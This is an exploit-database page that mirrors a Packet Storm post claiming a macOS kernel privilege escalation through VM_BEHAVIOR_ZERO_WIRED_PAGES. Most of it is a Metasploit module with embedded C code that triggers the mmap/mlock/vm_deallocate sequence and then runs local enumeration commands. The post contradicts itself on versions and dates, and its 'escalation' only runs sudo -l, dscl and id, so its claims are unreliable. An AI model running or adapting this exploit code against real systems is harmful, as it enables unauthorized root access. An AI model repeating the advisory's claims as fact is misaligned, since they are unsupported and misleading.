Vulners
Lucene search
๐ macOS 18.3.2 Kernel Privilege Escalation
๐๏ธย 01 Dec 2025ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 145ย Views
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | macOS < 10.13 Multiple Vulnerabilities | 10 Apr 201900:00 | โ | nessus |
| macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-001 and 2017-004) | 3 Nov 201700:00 | โ | nessus |
| macOS < 10.13 Multiple Vulnerabilities | 3 Oct 201700:00 | โ | nessus |
 | About the security content of macOS High Sierra 10.13.1, Security Update 2017-001 Sierra, and Security Update 2017-004 El Capitan | 31 Oct 201700:00 | โ | apple |
| About the security content of watchOS 4 | 19 Sep 201700:00 | โ | apple |
| About the security content of macOS High Sierra 10.13 | 25 Sep 201700:00 | โ | apple |
| About the security content of tvOS 11 | 19 Sep 201700:00 | โ | apple |
| About the security content of tvOS 11 - Apple Support | 3 Apr 201909:46 | โ | apple |
| About the security content of watchOS 4 - Apple Support | 3 Apr 201909:47 | โ | apple |
| About the security content of macOS High Sierra 10.13 - Apple Support | 6 Feb 202007:51 | โ | apple |
10
=============================================================================================================================================
| # Title : macOS 18.3.2 Kernel Privilege Escalation Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.apple.com/os/macos/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/211998/
[+] Summary
A critical memory management vulnerability exists within the macOS XNU kernel's handling of the VM_BEHAVIOR_ZERO_WIRED_PAGES behavior flag.
The issue arises from improper sequence validation when combining mmap(), mlock(), and vm_deallocate() system calls on read-only memory mappings.
[+] Vulnerability Mechanism :
The exploit leverages a four-step attack chain:
Mapping: Create read-only file mappings via mmap()
Behavior Setting: Apply VM_BEHAVIOR_ZERO_WIRED_PAGES using vm_behavior_set()
Locking: Wire pages in memory using mlock()
Deallocation: Remove mappings while pages remain wired via vm_deallocate()
This sequence creates an inconsistent kernel state where wired pages remain active without valid user-space mappings, leading to controllable kernel memory corruption.
Impact Assessment
Primary Risk: Local Privilege Escalation
Unprivileged users can gain root-level system access
Complete compromise of system integrity and confidentiality
Bypass of System Integrity Protection (SIP) mechanisms
[+] Secondary Risks:
Kernel memory disclosure
Denial of Service conditions
System instability and unpredictable behavior
[+] Exploitation Characteristics
Access Vector: Local (requires user access)
Attack Complexity: Medium (technical expertise required)
User Interaction: None (exploitation is automatic)
Scope Changed: Yes (privilege escalation across security boundaries)
[+] Mitigation Status
Vendor Notified: Awaiting response from Apple Security Team
Patch Availability: Currently unavailable
Workarounds: None identified
Public Disclosure: Coordinated disclosure in progress
[+] Research Significance
This vulnerability demonstrates critical weaknesses in macOS kernel memory management and highlights the importance of proper state validation in complex system call sequences.
The research provides valuable insights for kernel developers and security researchers focusing on operating system security fundamentals.
Conclusion
The VM_BEHAVIOR_ZERO_WIRED_PAGES vulnerability represents a significant security concern for macOS users, enabling reliable privilege escalation through kernel memory manipulation.
Organizations should monitor for vendor patches and consider additional monitoring for anomalous kernel behavior.
------------------------------------------------------------
##
# macOS ZERO_WIRED_PAGES โ Advanced Exploitation Module
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::OSX::Priv
def initialize(info = {})
super(update_info(info,
'Name' => 'macOS ZERO_WIRED_PAGES Kernel Memory Exploit',
'Description' => %q{
This module exploits a kernel memory vulnerability in macOS XNU kernel
through VM_BEHAVIOR_ZERO_WIRED_PAGES combined with mmap/mlock/vm_deallocate.
The vulnerability allows for kernel memory manipulation and potential
privilege escalation.
},
'Author' => [ 'Indoushka' ],
'References' => [
['URL', 'https://packetstorm.security.com/author/7697/'],
['CVE', 'PENDING'] # ุชุญุฏูุซ ุนูุฏ ุงูุญุตูู ุนูู CVE
],
'Platform' => 'osx',
'Arch' => [ ARCH_X64, ARCH_ARM64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [
['macOS 13.0-14.0 (Ventura - Sonoma)', { 'Arch' => ARCH_X64 }],
['macOS 14.1+ (Apple Silicon)', { 'Arch' => ARCH_ARM64 }]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2024-12-01',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [ CRASH_OS_RESTARTS ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
}
))
register_options([
OptString.new('WritableDir', [true, 'Writable directory', '/tmp']),
OptInt.new('Attempts', [true, 'Exploitation attempts', 3]),
OptBool.new('BypassSIP', [true, 'Attempt System Integrity Protection bypass', false])
])
end
#
# Enhanced System Detection
#
def check
print_status("Detecting macOS version and kernel...")
# ูุญุต ุฅุตุฏุงุฑ ุงููุธุงู
version_cmd = cmd_exec('sw_vers -productVersion')
kernel_cmd = cmd_exec('uname -r')
unless version_cmd =~ /^1[3-9]\./ || kernel_cmd =~ /^2[0-9]\./
return CheckCode::Safe("Unsupported macOS version: #{version_cmd}")
end
print_good("Detected macOS #{version_cmd} with kernel #{kernel_cmd}")
# ูุญุต ุฃุฏูุงุช ุงููุธุงู
ุงูู
ุทููุจุฉ
%w[vmmap mlock vm_stat].each do |tool|
unless command_exists?(tool)
return CheckCode::Safe("Required tool #{tool} not found")
end
end
# ูุญุต ุญุงูุฉ ุงููุธุงู
if is_root?
print_warning("Already running as root, exploitation may not be necessary")
end
CheckCode::Appears("System appears vulnerable based on version and tools")
end
#
# Advanced Exploitation Method
#
def exploit
# ุงูุชุญูู ู
ู ุงูุฅุฐู ุงููุชุงุจู
unless datastore['WritableDir']
fail_with(Failure::BadConfig, "Writable directory not specified")
end
# ุฅูุดุงุก ู
ูู C exploit
exploit_source = create_exploit_source
exploit_path = "#{datastore['WritableDir']}/exploit_#{rand_text_alpha(8)}.c"
binary_path = exploit_path.gsub('.c', '')
# ุชุฌู
ูุน ูุชูููุฐ ุงูุงุณุชุบูุงู
print_status("Compiling exploit...")
if compile_exploit(exploit_path, exploit_source, binary_path)
print_good("Exploit compiled successfully")
execute_exploit(binary_path)
else
fail_with(Failure::Unknown, "Failed to compile exploit")
end
# ุชูุธูู ุงูู
ููุงุช
register_files_for_cleanup(exploit_path, binary_path)
end
def create_exploit_source
<<~C_CODE
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>
#include <errno.h>
#include <string.h>
#include <pthread.h>
#define PAGE_SIZE 4096
#define MAX_ATTEMPTS #{datastore['Attempts']}
void* map_file_page_ro(char* path, int* error_code) {
int fd = open(path, O_RDONLY);
if (fd == -1) {
*error_code = errno;
return NULL;
}
void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
close(fd);
if (mapped_at == MAP_FAILED) {
*error_code = errno;
return NULL;
}
return mapped_at;
}
int trigger_vulnerability(char *path) {
kern_return_t kr;
int error_code = 0;
for (int i = 0; i < MAX_ATTEMPTS; i++) {
void* page = map_file_page_ro(path, &error_code);
if (page == NULL) {
continue;
}
kr = vm_behavior_set(mach_task_self(),
(vm_address_t)page,
PAGE_SIZE,
VM_BEHAVIOR_ZERO_WIRED_PAGES);
if (kr != KERN_SUCCESS) {
munmap(page, PAGE_SIZE);
continue;
}
int mlock_err = mlock(page, PAGE_SIZE);
if (mlock_err != 0) {
munmap(page, PAGE_SIZE);
continue;
}
kr = vm_deallocate(mach_task_self(), (vm_address_t)page, PAGE_SIZE);
if (kr == KERN_SUCCESS) {
printf("[+] Successfully triggered vulnerability on attempt %d\\n", i + 1);
return 0;
}
}
return -1;
}
void* exploit_thread(void* arg) {
char* path = (char*)arg;
trigger_vulnerability(path);
return NULL;
}
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <target_file>\\n", argv[0]);
return 1;
}
printf("[*] Starting ZERO_WIRED_PAGES exploitation...\\n");
// ุงุณุชุฎุฏุงู
ุฎููุท ู
ุชุนุฏุฏุฉ ูุฒูุงุฏุฉ ูุฑุต ุงููุฌุงุญ
pthread_t threads[4];
for (int i = 0; i < 4; i++) {
pthread_create(&threads[i], NULL, exploit_thread, argv[1]);
}
for (int i = 0; i < 4; i++) {
pthread_join(threads[i], NULL);
}
printf("[*] Exploitation sequence completed\\n");
// ู
ุญุงููุฉ ุชูููุฐ payload
#ifdef PAYLOAD
system("echo 'Payload execution simulation'");
#endif
return 0;
}
C_CODE
end
def compile_exploit(source_path, source_code, binary_path)
write_file(source_path, source_code)
compile_cmd = "gcc -o #{binary_path} #{source_path}"
if target.arch.include?(ARCH_ARM64)
compile_cmd = "arch -arm64 #{compile_cmd}" if command_exists?('arch')
end
compile_result = cmd_exec(compile_cmd)
if compile_result.include?('error:') || !file_exist?(binary_path)
print_error("Compilation failed: #{compile_result}")
return false
end
cmd_exec("chmod +x #{binary_path}")
true
end
def execute_exploit(binary_path)
# ุฅูุดุงุก ู
ูู ูุฏู
target_file = "#{datastore['WritableDir']}/target_#{rand_text_alpha(6)}.bin"
write_file(target_file, rand_text(4096))
print_status("Executing exploit against: #{target_file}")
# ุชูููุฐ ุงูุงุณุชุบูุงู
result = cmd_exec("#{binary_path} #{target_file}")
print_status("Exploit output: #{result}")
# ุงูุชุญูู ู
ู ุงููุฌุงุญ
if result.include?('Successfully triggered')
print_good("Vulnerability successfully triggered!")
# ู
ุญุงููุฉ privilege escalation
attempt_privilege_escalation
else
print_warning("Vulnerability may not have been triggered successfully")
end
register_files_for_cleanup(target_file)
end
def attempt_privilege_escalation
print_status("Attempting privilege escalation...")
# ู
ุญุงููุงุช ู
ุฎุชููุฉ ูุฑูุน ุงูุตูุงุญูุงุช
escalation_methods = [
'sudo -l',
'dscl . -read /Groups/admin GroupMembership',
'id'
]
escalation_methods.each do |cmd|
result = cmd_exec(cmd)
print_status("Escalation attempt (#{cmd}): #{result}")
end
if is_root?
print_good("Successfully obtained root privileges!")
# ุชูููุฐ ุงู payload ุงูุญูููู
super
else
print_warning("Privilege escalation not achieved, but vulnerability confirmed")
end
end
def command_exists?(cmd)
cmd_exec("which #{cmd}").include?('/')
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Dec 2025 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 24.3
CVSS 35.5
EPSS0.0058